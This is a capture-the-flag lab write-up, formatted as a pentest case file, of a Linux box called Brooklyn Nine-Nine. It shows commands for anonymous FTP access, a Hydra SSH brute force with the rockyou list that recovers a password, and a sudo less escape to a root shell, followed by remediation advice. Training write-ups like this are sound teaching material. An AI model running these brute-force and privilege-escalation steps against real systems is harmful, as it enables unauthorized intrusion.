Case file

Anonymous FTP note, SSH spray, and sudo less escape

Foundations Linux engagement: anonymous FTP leaked usernames and a weak-password hint; Hydra recovered jake’s SSH secret; NOPASSWD less spawned a root shell via GTFOBins.

Foundations22 minLinux · FTP · SSH · Privilege Escalation
01

Engagement summary

Anonymous FTP disclosed operational notes naming jake. Rockyou spray unlocked SSH; sudo less completed root without a password.

BROOKLYN NINE-NINE (10.10.112.152) exposed vsftpd with anonymous read, OpenSSH, and Apache. note_to_jake.txt named Amy, Jake, and Holt and stated Jake’s password was weak. Hydra against SSH recovered jake:987654321. The user artifact lived under holt’s home. sudo -l allowed /usr/bin/less as root with NOPASSWD; opening any file and escaping with !/bin/sh returned a root shell.

Business impact

Anonymous FTP that publishes usernames accelerates credential attacks. Weak SSH passwords and interactive pagers under sudo are root. Disable anonymous FTP, enforce strong SSH secrets or keys, and never grant less/more/man via sudo.

02

Anonymous FTP and SSH spray

FTP note guided Hydra; jake:987654321 authenticated over SSH.

OPERATOR · FTP / HYDRA

savvy@lab:~$ nmap 10.10.112.152 -sV -sC -Pn

21/tcp open ftp vsftpd 3.0.3

22/tcp open ssh OpenSSH 7.6p1

savvy@lab:~$ ftp 10.10.112.152

Name: anonymous

ftp> get note_to_jake.txt

# Jake's password is weak; users Amy/Jake/Holt

savvy@lab:~$ hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.112.152 ssh -t 50

[22][ssh] login: jake password: 987654321

savvy@lab:~$ ssh jake@10.10.112.152

savvy@lab:~$

03

sudo less to root

NOPASSWD less accepted !/bin/sh for a root shell.

OPERATOR · ROOT

savvy@lab:~$ sudo -l

(root) NOPASSWD: /usr/bin/less

savvy@lab:~$ sudo less /etc/profile

!/bin/sh

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Require authenticated FTP or remove it. Enforce MFA/keys for SSH. Replace sudo less with non-interactive, least-privilege tooling.